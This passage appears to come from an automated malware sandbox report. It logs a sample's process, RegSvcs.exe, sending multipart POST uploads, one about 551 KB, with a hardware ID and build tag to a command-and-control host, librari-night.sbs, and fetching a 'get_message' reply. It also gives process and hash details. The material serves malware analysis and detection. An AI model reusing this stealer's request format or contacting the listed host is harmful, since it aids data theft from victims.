                                                                                                                                      2024-11-22 04:02:16 UTC5241OUTData Raw: 3e 93 af 35 13 92 cd 36 8a 95 d9 76 89 c4 4d c9 4d d9 5a b5 da 68 27 0c 46 c7 33 b7 ee 57 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 75 6e 20 0a e6 d6 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 ce 0d 46 c1 dc ba 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d6 b9 81 28 98 5b f7 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 3a 37 18 05 73 eb 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 e7 06 a2 60 6e dd 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                      Data Ascii: >56vMMZh'F3Wun 4F([:7s~X`nO
                                                                                                                                      2024-11-22 04:02:17 UTC1027INHTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 22 Nov 2024 04:02:17 GMT
                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: close
                                                                                                                                      Set-Cookie: PHPSESSID=kp9au68uvipcjfh9g1gsg747og; expires=Mon, 17-Mar-2025 21:48:56 GMT; Max-Age=9999999; path=/
                                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                                      vary: accept-encoding
                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JL7my5u7wAes5kdFJ7DqVl7wgv%2FBFl%2FiqzCa4fDt8p1KHjPs4eCsi8y25U6o7%2Bw5%2Fir9tzvGi%2FYgRPaM%2BIu2Eyi6bX7FqjQ4xcWb8TAxFv%2BNeIYHBleXoSVkN1FwmMHySz9ZRw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                      Server: cloudflare
                                                                                                                                      CF-RAY: 8e6605e84ccd8c35-EWR
                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1916&sent=14&recv=25&lost=0&retrans=0&sent_bytes=2843&recv_bytes=21536&delivery_rate=1499743&cwnd=242&unsent_bytes=0&cid=bee38ee4d54c4081&ts=872&x=0"
                                                                                                                                      2024-11-22 04:02:17 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a
                                                                                                                                      Data Ascii: eok 8.46.123.75
                                                                                                                                      2024-11-22 04:02:17 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: 0


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      5192.168.2.549715172.67.206.1724431248C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-11-22 04:02:19 UTC277OUTPOST /api HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Content-Type: multipart/form-data; boundary=AN34G8DXPIQAP
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                      Content-Length: 1233
                                                                                                                                      Host: librari-night.sbs
                                                                                                                                      2024-11-22 04:02:19 UTC1233OUTData Raw: 2d 2d 41 4e 33 34 47 38 44 58 50 49 51 41 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 41 38 41 30 34 33 37 36 35 39 38 36 36 43 42 36 33 43 46 43 46 37 45 36 43 34 35 46 38 33 38 0d 0a 2d 2d 41 4e 33 34 47 38 44 58 50 49 51 41 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 41 4e 33 34 47 38 44 58 50 49 51 41 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 46 63 39 42 6e 38 2d 2d 74 65 73 74 0d 0a 2d 2d 41 4e 33 34 47 38 44 58 50 49 51 41
                                                                                                                                      Data Ascii: --AN34G8DXPIQAPContent-Disposition: form-data; name="hwid"BA8A0437659866CB63CFCF7E6C45F838--AN34G8DXPIQAPContent-Disposition: form-data; name="pid"1--AN34G8DXPIQAPContent-Disposition: form-data; name="lid"Fc9Bn8--test--AN34G8DXPIQA
                                                                                                                                      2024-11-22 04:02:19 UTC1020INHTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 22 Nov 2024 04:02:19 GMT
                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: close
                                                                                                                                      Set-Cookie: PHPSESSID=5bogpsl4eqb4ljajkrv7d5s1ms; expires=Mon, 17-Mar-2025 21:48:58 GMT; Max-Age=9999999; path=/
                                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                                      vary: accept-encoding
                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1qGP1m3OO6ikcE8HWevZTkQ8Mo6uhQ8emN%2FpTXhgG%2FNE8R4bTjrs6VXHpaFxFNw509l9%2BEnhISsatMQne%2FI7UWGfbzO%2F54S4BbCVO2gEZlrGwGPP7RfIR8OY1FP1pdJzP7YeeA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                      Server: cloudflare
                                                                                                                                      CF-RAY: 8e6605f6a9d24366-EWR
                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1618&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2843&recv_bytes=2146&delivery_rate=1772920&cwnd=234&unsent_bytes=0&cid=130dda963c70e24d&ts=740&x=0"
                                                                                                                                      2024-11-22 04:02:19 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a
                                                                                                                                      Data Ascii: eok 8.46.123.75
                                                                                                                                      2024-11-22 04:02:19 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: 0


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      6192.168.2.549723172.67.206.1724431248C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-11-22 04:02:21 UTC283OUTPOST /api HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Content-Type: multipart/form-data; boundary=XOQV0YRX0LEO9RK9T
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                      Content-Length: 551350
                                                                                                                                      Host: librari-night.sbs
                                                                                                                                      2024-11-22 04:02:21 UTC15331OUTData Raw: 2d 2d 58 4f 51 56 30 59 52 58 30 4c 45 4f 39 52 4b 39 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 41 38 41 30 34 33 37 36 35 39 38 36 36 43 42 36 33 43 46 43 46 37 45 36 43 34 35 46 38 33 38 0d 0a 2d 2d 58 4f 51 56 30 59 52 58 30 4c 45 4f 39 52 4b 39 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 58 4f 51 56 30 59 52 58 30 4c 45 4f 39 52 4b 39 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 46 63 39 42 6e 38 2d 2d 74 65 73 74 0d 0a 2d 2d
                                                                                                                                      Data Ascii: --XOQV0YRX0LEO9RK9TContent-Disposition: form-data; name="hwid"BA8A0437659866CB63CFCF7E6C45F838--XOQV0YRX0LEO9RK9TContent-Disposition: form-data; name="pid"1--XOQV0YRX0LEO9RK9TContent-Disposition: form-data; name="lid"Fc9Bn8--test--
                                                                                                                                      2024-11-22 04:02:21 UTC15331OUTData Raw: b8 03 7b fa b1 65 c1 2c 31 ba 87 0e de f4 6d 0c af 99 a6 00 7c 7e cb 17 fc c9 72 67 bd 81 29 9b 5a cc d5 f5 07 e1 b3 52 fd 4d 52 2b ef a6 9a e5 c6 be 19 90 94 66 70 5f 0a 35 14 e1 2d a1 c5 0f bd 16 9a ff d4 f6 8f 61 ac 31 32 56 35 39 08 83 2c 9f 93 99 84 f4 40 48 72 6b 4e db 35 3e 51 74 bf a1 f1 03 e3 f7 21 93 51 64 e5 bb 0e b6 50 9e 01 42 5d e1 ab 51 cb 90 2f 31 3e 21 68 6e b5 70 d5 bd 04 9a 72 2e 78 62 f9 a7 3e f3 7a 43 d3 0c ba 06 9f eb 09 dd 51 ff 81 ef 8b 3d a6 54 8c 4b 0b 0f 28 b1 f7 10 14 08 96 c2 6f 5e 9d b4 4e 14 a0 2c 4d aa 7d 4f 0a 8b ba b0 15 1d 7c 22 72 3f dd eb 4f 99 b2 b6 36 17 54 e8 0a 8e 0c ae 28 32 fa 6e db 23 c1 71 24 f9 30 ce 3f 11 72 77 00 b5 e4 66 08 0e e2 8e 49 8c 52 fc d9 1b 4a 80 76 04 05 fb b8 85 bf f3 1b af 7c a2 09 4e 48 6c bd
                                                                                                                                      Data Ascii: {e,1m|~rg)ZRMR+fp_5-a12V59,@HrkN5>Qt!QdPB]Q/1>!hnpr.xb>zCQ=TK(o^N,M}O|"r?O6T(2n#q$0?rwfIRJv|NHl
                                                                                                                                      2024-11-22 04:02:21 UTC15331OUTData Raw: 6e 0a 01 69 65 38 70 af 84 0a b0 c2 12 a8 da 7c c3 74 5c 5a 2a f1 44 98 f3 9e a7 c2 ad 59 1a de d9 b1 75 4f d3 63 ea 28 03 92 de 5e 5c 15 25 a1 ab c7 c9 89 a8 b7 92 85 81 e8 4f c3 94 b8 e8 38 0a 6e 77 1b ea f6 2d 51 9f 50 3e 31 8f 14 19 87 08 37 9b 13 58 61 88 ef 2f e3 82 cb c2 8d 28 ff c4 39 c4 8b 00 25 e5 52 fe 85 da 8e 60 84 be e0 6c 6d 06 43 62 6b 55 df 78 46 e9 f7 68 95 f1 58 6d 85 f2 54 6f 82 0a 3e 3b 2e 02 53 ba ed d6 46 ac 67 56 b2 33 06 b3 be 15 a4 9a 2a cc 2d 0a 1e 69 89 64 b9 2f fc c6 09 1f 89 b4 b4 9b c8 a9 68 d3 8e 5b e3 34 b1 dc 0b 9a 66 f8 e6 9a c7 8d af dc 0e 0f 6d ae 1f 59 f7 35 a5 05 88 b6 c9 a5 46 dc ee 5d d5 22 7f f5 25 b6 19 76 84 cb 32 cf d5 e4 21 da 71 13 92 99 d2 3e 82 d5 a7 da b2 d0 5d 21 f1 33 0e 00 43 48 f8 28 1c 0f 93 31 47 5f
                                                                                                                                      Data Ascii: nie8p|t\Z*DYuOc(^\%O8nw-QP>17Xa/(9%R`lmCbkUxFhXmTo>;.SFgV3*-id/h[4fmY5F]"%v2!q>]!3CH(1G_
                                                                                                                                      2024-11-22 04:02:21 UTC15331OUTData Raw: b7 04 18 3a 72 67 7f f8 7d 49 33 fe ef 9d ad 10 43 2f 3a a8 ef f9 1c ff 8f 10 42 07 98 53 47 7e 46 61 ab 00 0f ce e1 ed 30 80 77 e7 90 c7 d2 9d c9 d9 ff f7 ec f0 53 a0 eb 0c d2 82 61 e4 a6 01 bd 3b fd 2a b0 76 c7 37 b4 f3 81 f8 59 ef 0e 9d be 48 b7 62 b1 97 af d2 03 5a 2c d0 e4 7f 60 0f e1 38 09 78 8f 4b 58 a9 2a 90 3a 2f ca e8 fc f3 84 ce d8 3e 0c 3b 12 6c 8a 71 7e a7 6d 9a f0 80 87 0f 65 1a a9 93 eb 87 23 a8 ff fd f1 9b 52 38 ff 4f 4e 84 18 df cd 24 33 d8 21 10 08 92 19 bf 02 55 19 65 a5 f4 a4 1b a4 0a d4 f4 45 ea 37 01 46 ba 84 38 1a 4e 7e 1c 47 e0 44 97 88 ad fc b6 0a 3f ea d1 c7 fb 15 e7 48 6d dc d5 8c df d3 ac bc 52 a7 95 a5 98 38 92 e4 92 8e 0e ef 33 3d 58 89 66 67 e3 d7 56 1c d7 84 05 76 0b e6 17 90 f5 b0 e2 1d 3f c7 c0 91 66 8a 22 42 b5 d8 3f 69
                                                                                                                                      Data Ascii: :rg}I3C/:BSG~Fa0wSa;*v7YHbZ,`8xKX*:/>;lq~me#R8ON$3!UeE7F8N~GD?HmR83=XfgVv?f"B?i
                                                                                                                                      2024-11-22 04:02:21 UTC15331OUTData Raw: 9c ee 2e b5 a1 f4 40 b6 5f 1a cb 6a cd e4 ec 25 72 d5 a6 df 9a 3e 1e 3f 71 9c f3 ee fc 1c 9f 14 fe 00 9e 8e e0 55 16 ce f5 6d 78 73 d8 8d 34 24 27 f1 b1 1b e2 4d 93 99 46 1f 14 ea aa 17 47 3a 2b 02 25 7f 9f 51 66 28 88 bc 02 74 3c c7 4f 3b 33 3a ac 43 c3 03 42 5e 72 4c 08 e2 78 03 25 26 b6 f8 06 19 45 0e c5 b1 84 fd 76 c6 11 c8 8f 1d 97 b7 3b 46 4c 2a 30 90 15 da b7 e7 1c cb fd d4 09 2f 31 1d b1 ed 9f cb 27 35 31 f7 e5 42 ef fc 3b 9d e4 3e 33 43 4a 5b 93 dc 4c f4 c6 ef 03 e7 3e 38 35 19 77 1e 04 2f 0f 27 79 f2 71 96 fa 60 6d ed d3 88 56 c4 35 85 60 c3 b4 2f ca fd dd 10 a2 c5 39 75 7c 50 31 f4 f2 bf b7 a0 0a 0b 9f 8b 0b 59 67 5d 02 71 a5 10 83 00 7f 0d c4 58 42 20 75 8e 51 68 93 79 41 42 d7 e8 07 94 59 fb 61 66 73 14 45 de fa d8 fe 78 a6 25 17 61 ee 2f da
                                                                                                                                      Data Ascii: .@_j%r>?qUmxs4$'MFG:+%Qf(t<O;3:CB^rLx%&Ev;FL*0/1'51B;>3CJ[L>85w/'yq`mV5`/9u|P1Yg]qXB uQhyABYafsEx%a/
                                                                                                                                      2024-11-22 04:02:21 UTC15331OUTData Raw: 5f 7f e0 59 ee cf b9 47 a4 08 80 69 5b 6f a9 03 a9 6e 02 29 d4 a1 8d 26 34 3c cc 09 71 3b 9b bf ce 99 ad 4e 28 35 62 77 4b a1 5e 69 b0 da b1 13 3d b0 a2 55 0f bc 66 f8 fb 0a 09 47 00 0b ac e5 3f 04 d6 17 f8 35 f9 c1 11 44 21 05 e8 b4 2d f0 e7 64 d4 92 b4 39 31 ac 8c 0a ae 18 a8 7a e7 ed b3 32 f4 59 6d 6b 9e 3d f6 9f b7 02 47 18 38 87 9d c1 82 58 5e a0 b9 d0 c2 e4 2f fe 73 1c 87 e2 79 a1 65 f7 39 66 c8 fe ab 90 6e 8d 74 ca b4 a0 4a 54 44 6f f6 66 84 bc 2a 42 9a 59 df 7c 92 1c 31 65 2e f8 ae 42 d3 64 40 c7 a3 24 f2 10 79 cd b3 43 6f fe 43 c1 01 13 bf df 38 23 3d ac 04 50 c1 46 99 02 f8 8a b5 3a 1a 8a c5 80 ad a7 d2 3a 2a 20 97 e0 6b a7 09 7d a4 c1 ad 97 21 86 a5 dc 4e 9c 08 83 99 e2 5d b7 67 5e 8c a7 6e 46 c3 27 41 32 41 dd 87 27 33 82 1c 62 e6 aa 38 cc 88
                                                                                                                                      Data Ascii: _YGi[on)&4<q;N(5bwK^i=UfG?5D!-d91z2Ymk=G8X^/sye9fntJTDof*BY|1e.Bd@$yCoC8#=PF::* k}!N]g^nF'A2A'3b8
                                                                                                                                      2024-11-22 04:02:21 UTC15331OUTData Raw: 97 b3 69 81 1a b6 27 21 42 6d 66 c5 5a d7 cf 9c 23 2a 3c 23 e7 e3 8e 6d b7 78 ac 95 27 f0 67 b4 cb 54 15 ba fc df 3e 34 23 46 c3 72 fc 57 71 5a b5 84 8c 3f 7c 7e a7 6b 01 5b 55 02 d5 85 7b 12 a8 f5 e3 84 4d e6 d1 a8 f7 e2 5a e3 e0 5b ea 89 b4 10 89 4c e5 09 84 1d 93 62 1f fe 87 2f 4f 91 45 42 b0 4f 9e 2b fb dd 1f dc 7c 2f bf 66 d6 4e 9b a7 cf 4d ab 2c c1 88 1d 86 7b 3d f9 4e 52 c4 d1 49 2d 14 ed de 56 9b d8 68 d8 6f f4 4d bd e6 78 6f 76 76 5b 09 64 ed 20 c2 4f e1 df 90 c0 5f 75 88 fd 33 48 94 82 f1 88 b7 2d 6d 87 70 6a 0a 27 2f 35 bc 33 46 75 95 15 dd 53 c8 49 d4 1c e7 b8 be 4c c2 5b dd 23 cd 1a fa 61 af 9f 93 a1 25 7a 27 c0 6d a5 2c 81 a9 ce a9 02 7f d4 de 32 d7 41 9b 16 93 3c f3 76 03 84 24 78 1b 9c b8 8c bc b8 ef 45 61 22 8c 27 59 b9 a4 a3 83 e1 5b 2a
                                                                                                                                      Data Ascii: i'!BmfZ#*<#mx'gT>4#FrWqZ?|~k[U{MZ[Lb/OEBO+|/fNM,{=NRI-VhoMxovv[d O_u3H-mpj'/53FuSIL[#a%z'm,2A<v$xEa"'Y[*
                                                                                                                                      2024-11-22 04:02:21 UTC15331OUTData Raw: 89 a0 d7 48 1a ff 3e d1 3f 26 db 06 e5 41 9e 46 b0 c6 5b 63 f5 59 25 42 09 12 fe 85 ac 7f 71 3d a9 5a 09 8d 6d 76 6f 17 2b df 7b ce 21 bd 12 e3 1b 48 20 13 1a ca b4 28 d8 4b 37 08 03 31 da 86 78 a1 86 11 e3 10 df 0e f7 8b 0f b1 97 ea 0c e4 f1 c5 a8 2b e9 84 bb 87 cd 5a bc 2f 3d 20 64 3a f9 b1 7f d3 2d b3 6b 80 5f 14 55 fb df 93 f1 e2 e0 90 e4 a3 dd 7e 83 c2 c5 c0 dd f1 ad 22 98 95 43 4c 90 f2 03 38 be e8 53 5f d4 69 a7 8f 93 be d2 9c 35 45 e9 4b 8d d1 4d 48 d4 40 5a 31 28 1c e2 43 04 28 42 ad 3d fd 16 e1 86 d6 ab 2d 96 52 e7 74 f1 ed 11 b4 00 ef 42 09 f0 14 26 be bb 20 4c ca 7d 84 5d 0c 5a eb 3f 12 63 e8 0f 76 a6 44 fa 9e 37 61 14 be 4b 5d b2 da 39 28 5f 74 b8 01 41 7a 82 86 a5 10 62 32 6f 4f 68 fd 94 f2 38 af bf 0a d9 b0 3e 62 02 33 9c 26 63 4e 07 37 0b
                                                                                                                                      Data Ascii: H>?&AF[cY%Bq=Zmvo+{!H (K71x+Z/= d:-k_U~"CL8S_i5EKMH@Z1(C(B=-RtB& L}]Z?cvD7aK]9(_tAzb2oOh8>b3&cN7
                                                                                                                                      2024-11-22 04:02:21 UTC15331OUTData Raw: ca f3 dd fd 30 af ef d9 3e ab 0b c8 60 25 2a 4c 7b 90 1f 44 33 55 ee d4 d2 82 99 8f 70 f8 49 95 76 fb 85 6a 54 59 3d 6b 31 98 9f 87 c4 43 48 f6 1e 05 61 86 b5 7e ee 0b a2 1f ea b7 ca d0 0f ef e1 4c 8a 38 9e da 69 ed 2d 70 91 23 9b 8d 27 e2 15 06 58 63 41 05 5e 66 31 71 d1 b7 2a ac bb 54 07 5b e1 df 2b e2 fb 62 37 c4 6e 76 b3 54 79 83 2a d5 a2 bf 37 99 71 9b f3 1f 5a 8f 0d 3f 74 8f 0a 71 22 d4 ef ef 1f 51 5a 65 2a 87 27 84 a8 85 0c 95 45 21 e8 bb d3 e3 c3 40 59 18 df 0b 78 4d 7a 8e 9f f6 60 79 fd d7 30 6c fe db bb bc 0b e0 26 52 7f 1e 17 02 c7 de db 9b 11 9f 17 23 dd 9b 3e 54 18 fe ae 89 17 28 f8 96 cd 98 38 5c 30 ca 0d 9f 3c a0 47 9d 1c f3 38 fe a4 96 0c f4 c4 a6 01 c2 fd 52 41 19 54 50 51 8d a5 47 21 0b a0 85 cc e4 2e 80 d2 ee c7 d7 eb c2 fe 0f dd 99 ea
                                                                                                                                      Data Ascii: 0>`%*L{D3UpIvjTY=k1CHa~L8i-p#'XcA^f1q*T[+b7nvTy*7qZ?tq"QZe*'E!@YxMz`y0l&R#>T(8\0<G8RATPQG!.
                                                                                                                                      2024-11-22 04:02:21 UTC15331OUTData Raw: 30 2e 84 c0 4b b0 c5 f5 25 88 12 cc 27 c7 d2 f0 29 3e 2e 0e e2 b2 57 9b 0a 33 f4 e2 43 f8 0f 71 31 28 59 48 7d 41 ac 48 d6 38 62 2e 85 97 50 f9 69 12 ff a6 45 b2 de 28 88 d0 2a 0d ef 7d b8 e6 9a 60 2a 05 7a 4d 2a 50 1a 21 0e b2 11 84 de 9b 7b 58 c9 ad 3f 3e a5 5a 18 1f 58 9f 7a 94 84 d7 10 6e 7f 87 07 c6 49 9b e7 27 f8 ef 93 3f f2 6c 40 f5 81 16 81 f7 85 3a a1 de f3 8a 97 be c6 45 d2 6d 99 0b 11 ee 03 13 a6 7a 9f 83 69 9a e8 1a 23 e3 2e 5d 10 3a ff 73 3a c3 68 20 ea 93 36 c7 75 bc 65 dd a6 65 b3 83 6f 34 a6 55 10 e1 d3 43 fa 81 0b bc 7f cd f8 f5 16 a2 b1 09 fd b1 84 cd a2 ca 89 7a f7 81 64 de 8c 38 eb 57 4f 72 e5 9b c1 cd e7 95 eb 03 36 e5 b4 9b ac 5f 73 0a 05 b4 45 56 10 f7 9c 28 44 5b 1c 22 04 90 32 c3 3e 54 6e 16 8c b9 fa 30 42 b8 43 cd e2 41 d5 d8 88
                                                                                                                                      Data Ascii: 0.K%')>.W3Cq1(YH}AH8b.PiE(*}`*zM*P!{X?>ZXznI'?l@:Emzi#.]:s:h 6ueeo4UCzd8WOr6_sEV(D["2>Tn0BCA
                                                                                                                                      2024-11-22 04:02:23 UTC1027INHTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 22 Nov 2024 04:02:23 GMT
                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: close
                                                                                                                                      Set-Cookie: PHPSESSID=4tf4b3b07k6bvfs0b0hg5p6od4; expires=Mon, 17-Mar-2025 21:49:02 GMT; Max-Age=9999999; path=/
                                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                                      vary: accept-encoding
                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=N%2F92IyHB%2F0jFUncHszzjieCLbIiFqSNS2HBuZuaoDyIlN%2FZ1qhsVqHVMjmAzy9LxcSWAG0gnvbRtN%2FWqqAAlRO18osyJHVjvI69M2dD33CR0t6o4pEsWTQFZX5OfNTp9%2FFF9Ig%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                      Server: cloudflare
                                                                                                                                      CF-RAY: 8e6606055b460f3b-EWR
                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1546&sent=299&recv=574&lost=0&retrans=0&sent_bytes=2845&recv_bytes=553831&delivery_rate=1836477&cwnd=211&unsent_bytes=0&cid=1f3a90a5ed55a301&ts=2317&x=0"


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      7192.168.2.549736172.67.206.1724431248C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-11-22 04:02:25 UTC265OUTPOST /api HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                      Content-Length: 81
                                                                                                                                      Host: librari-night.sbs
                                                                                                                                      2024-11-22 04:02:25 UTC81OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 46 63 39 42 6e 38 2d 2d 74 65 73 74 26 6a 3d 26 68 77 69 64 3d 42 41 38 41 30 34 33 37 36 35 39 38 36 36 43 42 36 33 43 46 43 46 37 45 36 43 34 35 46 38 33 38
                                                                                                                                      Data Ascii: act=get_message&ver=4.0&lid=Fc9Bn8--test&j=&hwid=BA8A0437659866CB63CFCF7E6C45F838
                                                                                                                                      2024-11-22 04:02:25 UTC1019INHTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 22 Nov 2024 04:02:25 GMT
                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: close
                                                                                                                                      Set-Cookie: PHPSESSID=enrv7fno7pf3bovh1othenbfmo; expires=Mon, 17-Mar-2025 21:49:04 GMT; Max-Age=9999999; path=/
                                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                                      vary: accept-encoding
                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wYL5LR73Yhe9c6v%2FxFzwMsyOV5qD5jrrM53Viy2oBd6orB2zFC9%2Bi4eb%2FgfKMMKLSvvcXvl50FwWn0i1VJTmr3wES%2FrE%2F1LEHAY7UJ0WlDi4GxFhdJrsuXuMYR5NsXmbWFw8sA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                      Server: cloudflare
                                                                                                                                      CF-RAY: 8e66061c5d0a8c0b-EWR
                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1914&sent=7&recv=8&lost=0&retrans=0&sent_bytes=2844&recv_bytes=982&delivery_rate=1506707&cwnd=206&unsent_bytes=0&cid=f44fc96619e328ac&ts=782&x=0"
                                                                                                                                      2024-11-22 04:02:25 UTC54INData Raw: 33 30 0d 0a 64 33 39 43 54 38 55 59 37 62 59 39 2b 34 7a 46 35 4a 62 47 31 78 62 61 36 44 76 58 34 69 48 61 6c 48 64 6e 61 72 59 43 52 45 34 73 49 67 3d 3d 0d 0a
                                                                                                                                      Data Ascii: 30d39CT8UY7bY9+4zF5JbG1xba6DvX4iHalHdnarYCRE4sIg==
                                                                                                                                      2024-11-22 04:02:25 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: 0


                                                                                                                                      Click to jump to process

                                                                                                                                      Click to jump to process

                                                                                                                                      Click to dive into process behavior distribution

                                                                                                                                      Click to jump to process

                                                                                                                                      Target ID:0
                                                                                                                                      Start time:23:01:58
                                                                                                                                      Start date:21/11/2024
                                                                                                                                      Path:C:\Users\user\Desktop\file.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:"C:\Users\user\Desktop\file.exe"
                                                                                                                                      Imagebase:0x400000
                                                                                                                                      File size:3'376'184 bytes
                                                                                                                                      MD5 hash:B570FCBE697EF79DB835D9B654974874
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Reputation:low
                                                                                                                                      Has exited:false

                                                                                                                                      Target ID:2
                                                                                                                                      Start time:23:02:02
                                                                                                                                      Start date:21/11/2024
                                                                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                                                                      Wow64 process (32bit):false
